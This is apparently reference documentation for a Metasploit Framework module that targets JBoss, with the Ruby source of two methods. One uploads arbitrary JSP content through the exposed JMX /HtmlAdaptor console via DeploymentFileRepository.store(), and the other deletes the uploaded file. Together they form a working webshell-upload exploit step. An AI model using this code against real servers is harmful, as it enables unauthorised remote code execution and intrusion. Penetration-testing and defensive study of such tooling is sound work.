Module: Msf::Exploit::Remote::HTTP::JBoss::DeploymentFileRepository

Included in:

Msf::Exploit::Remote::HTTP::JBoss

Defined in:

lib/msf/core/exploit/remote/http/jboss/deployment_file_repository.rb

Instance Method Summary

• #delete_file(folder, name, ext) ⇒ Rex::Proto::Http::Response^?

  Delete a file with DeploymentFileRepository.remove().

• #upload_file(base_name, jsp_name, content) ⇒ Rex::Proto::Http::Response^?

  Upload a text file with DeploymentFileRepository.store().

Instance Method Details

#delete_file(folder, name, ext) ⇒ Rex::Proto::Http::Response^?

Delete a file with DeploymentFileRepository.remove().

Parameters:

• folder (String) —

  The destination folder name

• name (String) —

  The destination file name

• ext (String) —

  The destination file extension

Returns:

• (Rex::Proto::Http::Response, nil) —

  The Rex::Proto::Http::Response response, nil if timeout

# File 'lib/msf/core/exploit/remote/http/jboss/deployment_file_repository.rb', line 48

def delete_file(folder, name, ext)
  params =  { }
  params.compare_by_identity
  params['action']     = 'invokeOpByName'
  params['name']       = 'jboss.admin:service=DeploymentFileRepository'
  params['methodName'] = 'remove'
  params['argType']    = 'java.lang.String'
  params['arg0']       = folder
  params['argType']    = 'java.lang.String'
  params['arg1']       = name
  params['argType']    = 'java.lang.String'
  params['arg2']       = ext

  opts = {
    'method'	=> http_verb,
    'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
  }

  if http_verb == 'POST'
    opts.merge!('vars_post' => params)
    timeout = 5
  else
    opts.merge!('vars_get' => params)
    timeout = 30
  end
  send_request_cgi(opts, timeout)
end

#upload_file(base_name, jsp_name, content) ⇒ Rex::Proto::Http::Response^?

Upload a text file with DeploymentFileRepository.store()

Parameters:

• base_name (String) —

  The destination base name

• jsp_name (String) —

  The destination file name

• content (String) —

  The content of the file

Returns:

• (Rex::Proto::Http::Response, nil) —

  The Rex::Proto::Http::Response response, nil if timeout

# File 'lib/msf/core/exploit/remote/http/jboss/deployment_file_repository.rb', line 11

def upload_file(base_name, jsp_name, content)
  params =  { }
  params.compare_by_identity
  params['action']     = 'invokeOpByName'
  params['name']       = 'jboss.admin:service=DeploymentFileRepository'
  params['methodName'] = 'store'
  params['argType']    = 'java.lang.String'
  params['arg0']       = base_name + '.war'
  params['argType']    = 'java.lang.String'
  params['arg1']       = jsp_name
  params['argType']    = 'java.lang.String'
  params['arg2']       = '.jsp'
  params['argType']    = 'java.lang.String'
  params['arg3']       = content
  params['argType']    = 'boolean'
  params['arg4']       = 'True'

  opts = {
    'method'	=> http_verb,
    'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
  }

  if http_verb == 'POST'
    opts.merge!('vars_post' => params)
  else
    opts.merge!('vars_get' => params)
  end

  send_request_cgi(opts)
end